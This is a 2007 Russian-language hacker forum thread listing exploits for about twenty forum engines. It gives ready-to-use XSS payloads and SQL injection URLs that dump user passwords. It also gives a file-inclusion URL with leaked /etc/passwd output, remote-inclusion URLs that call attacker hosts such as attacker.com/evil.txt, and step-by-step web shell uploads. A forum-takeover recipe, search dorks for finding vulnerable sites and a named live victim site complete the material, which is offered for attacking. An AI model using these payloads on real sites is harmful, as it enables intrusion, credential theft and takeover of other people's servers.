HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.04.2007, 15:31
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Форум: pHpAS
Версия: 1.26

1. Активная XSS.

1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.

Скрипт будет выполняться при про смотре коментариев.

2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.

Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.

2. SQL инъекция.

Уязвимость в сценарие show.php в параемтре id.

Код:
http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*
Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26

------------------------------------------------------------
------------------------------------------------------------

Форум: electrifiedForum
Версия: v1.70

1. Пасивная XSS.

Код:
http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>
Есть еще одна но, она будет выполняться только с админскими привилегиями:

Код:
http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>
2. Активная XSS.

1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.

2) В профиле в подписе (Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.

3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70

Последний раз редактировалось Grey; 23.04.2007 в 18:24..
 
Ответить с цитированием

  #12  
Старый 24.04.2007, 18:58
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Форум: He11.net Forums
Версия: 1.0

1. Пасивная XSS.

Код:
http://site.ru/forum/index.php?top_message=<script>alert();</script>
2. SQL инъекция.

1)
Код:
http://site.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*
в результате получаем строку вида:

1:grey:202cb962ac59075b964b07152d234b70:123

В базе данных хранится и зашифрованный пароль (md5) и пароль в чистом виде.

2)
Код:
http://site.ru/forum/view_thread.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),6,7,8,9+from+Dragon_users/*
------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"

Пример уязвимого форума:

__http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char( 58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9, 10,11,12+from+Dragon_users/*

------------------------------------------------------------
------------------------------------------------------------

Форум: UBB Threads
Версия: 5.5

Пассивная XSS:

Код:
http://site.ru/showprofile.php?Cat=&User=<script>alert();</script>
Активная XSS:

При создание сообщения на форуме в поле Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.

Заливка шелла:

Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).

Шелл будет доступен по адресу:

http://site.ru/includes/header.php

Последний раз редактировалось Grey; 14.06.2007 в 16:14..
 
Ответить с цитированием

  #13  
Старый 24.04.2007, 22:34
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

Форум FastBB 9.20

1. Возможности писать в закрытые темы.

Необходимо зайти в закрытую тему, в адресной строке поменять №1 на №6 - и
попадаешь на страницу создания сообщения. Пишешь сообщение, отправляешь и оно
появляется в теме.
 
Ответить с цитированием

  #14  
Старый 26.04.2007, 22:10
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

Форум: Ultimate PHP Board

Необходимо зарегестрироватся.Регестр руемся и запоминаем что мы написали.
Теперь самое интересное - использование уязвимости. Баг в форуме в том что у всех зарегестрированных пользователей есть права на просмотр файлов:
_http://www.forum.de/forum/admin.php - панель администратора.
_http://www.forum.de/forum/admin_forum.php - администрирование форумами.
_http://www.forum.de/forum/admin_members.php - позволяет редактировать пользователей.
_http://www.forum.de/forum/admin_config.php - панель настройки форума.
Идем на _http://www.forums.de/forum/admin_members.php и перед нами список пользователей. Ставим себе права админа, перезаходим, удаляем бывших админов и форум ваш!
 
Ответить с цитированием

  #15  
Старый 14.05.2007, 09:42
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Форум: Anyboard все версии
Локальный инклуд файлов в параметре vf
Например на сайте производителя:

Код:
http://www.anyboard.net/cgi-bin/anyboard.cgi/rec/Party_and_Poultry_Information_Exchange/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D
Код:
______________________________________________
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
http://www.google.ru/search?q=inurl:?cmd=retr
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
alias:x:500:500::/var/qmail/alias:/bin/bash
qmaild:x:501:500::/var/qmail:/bin/bash
qmaill:x:502:500::/var/qmail:/bin/bash
qmailp:x:503:500::/var/qmail:/bin/bash
qmailq:x:504:501::/var/qmail:/bin/bash
qmailr:x:505:501::/var/qmail:/bin/bash
qmails:x:506:501::/var/qmail:/bin/bash
vpopmail:x:507:502::/home/vpopmail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
________________________________________________

Последний раз редактировалось l1ght; 02.03.2009 в 12:38.. Причина: Rebz: хм, неплохо.. если сам нашёл..
 
Ответить с цитированием

XSS уязвимость на Intellect Board 2.12
  #16  
Старый 17.05.2007, 20:46
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию XSS уязвимость на Intellect Board 2.12

XSS уязвимость на Intellect Board 2.12

Была найдена XSS уязвимость в форумном движке Intellect Board 2.12.
Устранение:
Обновить скрипты.
Уязвимость: можно в качестве адреса домашней страницы или ЖЖ поставить javascript:. А дальше - классическая XSS: перехватываем идентификатор сессии админа и влезаем в АЦ. Правда, сделать это не так уж и просто: по умолчанию там выполняется привязка сессии к HTTP_USER_AGENT, да и время жизни сессии ограничено несколькими часами.
 
Ответить с цитированием

  #17  
Старый 29.05.2007, 19:20
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами: 10051477

Репутация: 136
По умолчанию

ExBB
Описание:Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell

VistaBB <= 2.x
Описание:Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251

Woltlab Burning Board 2.3.5
Описание:Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810

MiniBB <=1.5
Описание:Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?

MyBB < 1.1.3
Описание:Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909

PHORUM 5
Описание:Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008

UBB Threads

1.UBBThreads 5.x,6.x
Описание:Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере

2.UBB.threads >= 6.4.x
Описание:Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : */addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

Zix Forum
Описание:Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select% 201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1 ,1,J_Pass,null,null,null,null,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLog ins where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select% 201,null,null,null,1,1,1,null,1,1,J_User,null,1,1, 1,1,1,J_Pass,null,null,null,nu
ll,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20ad minLogins where approve=1 and '1'='1'

qjForum

Описание:Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username, 0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20memb er

tinyBB <= 0.3
Описание:Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

FunkBoard

Описание:Уязвимость в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875

QBoard <= v.1.1
Описание:Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]

FlashBB <= 1.1.5
Описание:Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921

LiteForum 2.1.1
Описание:Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt

Forum Russian Board 4.2
Описание:Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt

OpenBB 1.0.5
Описание:SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt

Gravity Board X v1.1
Описание:Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt

Zorum forum
Описание:выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt

Последний раз редактировалось Grey; 29.05.2007 в 19:35.. Причина: Удалил то, что повторяется в других темах.
 
Ответить с цитированием

  #18  
Старый 05.06.2007, 00:33
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Форум: WR-Форум
Версия: 1.8

------------------------------------------------------------

Про уязвимости форума читать тут:

http://forum.antichat.ru/showpost.ph...51&postcount=4 - (активные XSS)

------------------------------------------------------------

Заливка шелла (через админку):

Заходим в админку -> Настройки, в поле Описание (или в поле Е-майл администратора) вписываем код шелла следующим образом:

";?> <? Код шелла ?> <? //

к примеру сделам вывод строки 123123:

";?> <? echo(123123); ?> <? //

Шелл будет доступен по адресу:

http://site.ru/forum/config.php

При внедрение кода работа форума нарушена не будет.

Последний раз редактировалось Grey; 05.06.2007 в 11:49..
 
Ответить с цитированием

  #19  
Старый 12.06.2007, 20:11
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Форум: VumFOrum
Версия: v2.5

Пасcивная XSS:

Код:
http://site.ru/?forum=profile&user=<script>alert();</script>
Активная XSS:

1) В поле Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.

2) При регистрации пользователя в поле Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.

Заливка шелла:

Способ 1:

При создание темы/сообщения прикрепляем файл - шелл.

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

Способ 2:

При регистрации на форуме, в поле Имя введите ../shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/shell.php

Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:

При регистрации на форуме, в поле Имя введите ../upload/shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

Шелл будет доступен по адресу:

http://site.ru/upload/shell.php

Последний раз редактировалось Grey; 12.06.2007 в 20:15..
 
Ответить с цитированием

  #20  
Старый 14.06.2007, 17:59
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Форум: SMDS Forum
Версия: v.2.1 rus

Локальный инклуд:

Код:
http://site.ru/Files/all_forums.php?file_read_forums=[file]
Код:
http://site.ru/Files/write_log.php?file_read_logs=[file]
Код:
http://site.ru/Files/statistic.php?file_read_statistic=[file]
Код:
http://site.ru/Files/downloads.php?file_read_downl=[file]
http://site.ru/Files/downloads.php?file_add_downloads=[file]
Пассивные XSS:

Код:
http://site.ru/Files/buttons.php?forum_ext=1&language[but_index]=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?td_all=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?table_all=<script>alert();</script>
Код:
http://site.ru/Files/faq.php?vars[your_email]=<script>alert();</script>
Заливка шелла:

В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:

http://site.ru/Downloads/shell.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости CMS / форумов 115 07.08.2022 16:12
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей myBB] Goudini Уязвимости CMS / форумов 25 03.08.2011 08:20
[Обзор уязвимостей Phorum] _-[A.M.D]HiM@S-_ Уязвимости CMS / форумов 11 23.05.2010 13:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.